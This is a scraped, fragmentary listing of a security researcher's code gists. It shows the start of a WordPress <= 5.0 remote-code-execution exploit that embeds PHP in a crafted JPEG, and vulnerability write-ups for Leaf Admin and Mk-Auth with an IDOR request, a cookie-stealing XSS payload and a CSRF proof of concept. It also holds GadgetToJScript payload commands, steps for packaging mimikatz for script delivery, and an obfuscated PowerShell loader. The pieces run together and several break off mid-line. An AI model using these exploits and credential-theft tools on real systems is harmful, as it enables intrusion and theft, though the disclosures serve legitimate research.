alacerda / wordpress-rce.js
Created March 13, 2019 13:29 — forked from allyshka/wordpress-rce.js
WordPress <= 5.0 exploit code for CVE-2019-8942 & CVE-2019-8943
var wpnonce = '';
var ajaxnonce = '';
var wp_attached_file = '';
var imgurl = '';
var postajaxdata = '';
var post_id = 0;
var cmd = '<?php phpinfo();/*';
var cmdlen = cmd.length
var payload = '\xff\xd8\xff\xed\x004Photoshop 3.0\x008BIM\x04\x04'+'\x00'.repeat(5)+'\x17\x1c\x02\x05\x00\x07PAYLOAD\x00\xff\xe0\x00\x10JFIF\x00\x01\x01\x01\x00`\x00`\x00\x00\xff\xdb\x00C\x00\x06\x04\x05\x06\x05\x04\x06\x06\x05\x06\x07\x07\x06\x08\x0a\x10\x0a\x0a\x09\x09\x0a\x14\x0e\x0f\x0c\x10\x17\x14\x18\x18\x17\x14\x16\x16\x1a\x1d%\x1f\x1a\x1b#\x1c\x16\x16 , #&\x27)*)\x19\x1f-0-(0%()(\xff\xc0\x00\x0b\x08\x00\x01\x00\x01\x01\x01\x11\x00\xff\xc4\x00\x14\x00\x01'+'\x00'.repeat(15)+'\x08\xff\xc4\x00\x14\x10\x01'+'\x00'.repeat(16)+'\xff\xda\x00\x08\x01\x01\x00\x00?\x00T\xbf\xff\xd9';
var img = payload.replace('\x07PAYLOAD', String.fromCharCode(cmdlen) + cmd);
alacerda / gist:8fd4557e585a8707e9d3b798968e24c1
Created August 15, 2019 14:02
(CVE-2019-14755) - Leaf Admin RCE
[Suggested description]
The profile photo upload feature in Leaf Admin 61.9.0212.10 f allows
Unrestricted Upload of a File with a Dangerous Type.
------------------------------------------
[Additional Information]
Leaf Admin is a virtual appliance running a web application used to
manage Internet Service Providers (ISP). It controls which users are
enabled or disabled on the system (due to payment issues), connection
# Command to generate HTA code using GadgetToJScript
GadgetToJScript.exe -w hta
# Command to generate JS code using GadgetToJScript
GadgetToJScript.exe -w js
# Command to generate VBS code using GadgetToJScript
GadgetToJScript.exe -w vbs
# Command to generate VBA code using GadgetToJScript
import argparse

class Decrypter:
    SIMPLE_STRING = "0123456789ABCDEF"
    SIMPLE_MAGIC = 0xA3

    def __init__(self, password):
        self.data = password

    def next(self):
It is basically a wrap of the following projects:
- mimikatz (https://github.com/gentilkiwi/mimikatz)
- mimikatz in .NET by Casey Smith (https://gist.github.com/caseysmithrc/87f6572547f633f13a8482a0c91fb7b7)
Updated from 2.0.0 to 2.1.1 (https://gist.github.com/pljoel/410eeebcaf118b9ac8b8f2b40fd5e863)
- DotNetToJScript (https://github.com/tyranid/DotNetToJScript)
INSTRUCTIONS:
1. Grab the latest release of mimikatz: https://github.com/gentilkiwi/mimikatz/releases
2. a) Uncomment the build lines from Casey's project in Delivery.Program.Main() (you may want to comment out the Exec() line, though)
b) It will produce a file.b64; copy its content and replace the Delivery.Package.file string with it
alacerda / mkauth_19.01_idor
Last active January 3, 2021 14:42
Mk-Auth Authenticated IDOR via Invoice ID
Product Description:
Mk-Auth is a Brazilian Management System for Internet Service Providers used to control client access and permissions via a web interface panel.
Vulnerability Description:
It is possible to leak other users' sensitive information, such as the CPF (a personal identification number used in Brazil), by manipulating the number of the requested invoice.
Additional Information:
Any authenticated user can read arbitrary invoices, even ones that do not belong to the authenticated user. The response leaks sensitive information about the user the invoice refers to. See below an example of such a GET request:
GET /central/recibo.php?titulo=00006 HTTP/1.1
Vulnerability Type:
CWE-639: Authorization Bypass Through User-Controlled Key
alacerda / mkauth_19.01_user_impersonation
Created January 3, 2021 19:17
Mk-Auth User Impersonation Via Reflected XSS and Unprotected Session Cookie
Product Description:
Mk-Auth is a Brazilian Management System for Internet Service Providers used to control client access and permissions via a web interface panel.
Vulnerability Description:
It is possible to steal and reuse an admin session token by abusing a reflected XSS and an unprotected cookie.
Additional Information:
The session cookie (centralmka2) does not have the HttpOnly flag set, which allows JavaScript code to read its content. In addition, the “registro” parameter of the “logs_ajax.php” page is vulnerable to reflected XSS, which allows an attacker to take advantage of the misconfigured cookie. See below an example of a malicious request:
http://<mkserver>/admin/logs_ajax.php?registro=0&tipo=todos%27%3balert(document.cookie)%2f%2f
Vulnerability Type:
alacerda / mkauth_19.01_csrf_change_password
Created January 3, 2021 19:40
Mk-Auth CSRF in Clients Change Password Form
Product Description:
Mk-Auth is a Brazilian Management System for Internet Service Providers used to control client access and permissions via a web interface panel.
Vulnerability Description:
It is possible to change a user’s password by enticing a logged-in user to visit a malicious web page.
Additional Information:
A malicious actor may craft a web page that, when visited by a user authenticated on the Mk-Auth “central” module, automatically replaces that user’s password with one chosen by the attacker.
PoC:
<html>
function sandbanks {
    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')]
    [CmdletBinding()]
    Param (
        [Parameter(Position = 0)]
        [ValidateNotNullOrEmpty()]
        [String]
        $ModuleName = [Guid]::NewGuid().ToString()
    )
    $tzXzjieG99 = [Reflection.Assembly].Assembly.GetType('System.AppDomain').GetProperty('CurrentDomain').GetValue($null, @())
alacerda / dllmain.go
Created March 16, 2022 03:21 — forked from NaniteFactory/dllmain.go
An example implementation of a DllMain() entrypoint in Go. Build and invoke with: $ go build --buildmode=c-shared -o my.dll && rundll32.exe my.dll Test
package main
//#include "dllmain.h"
import "C"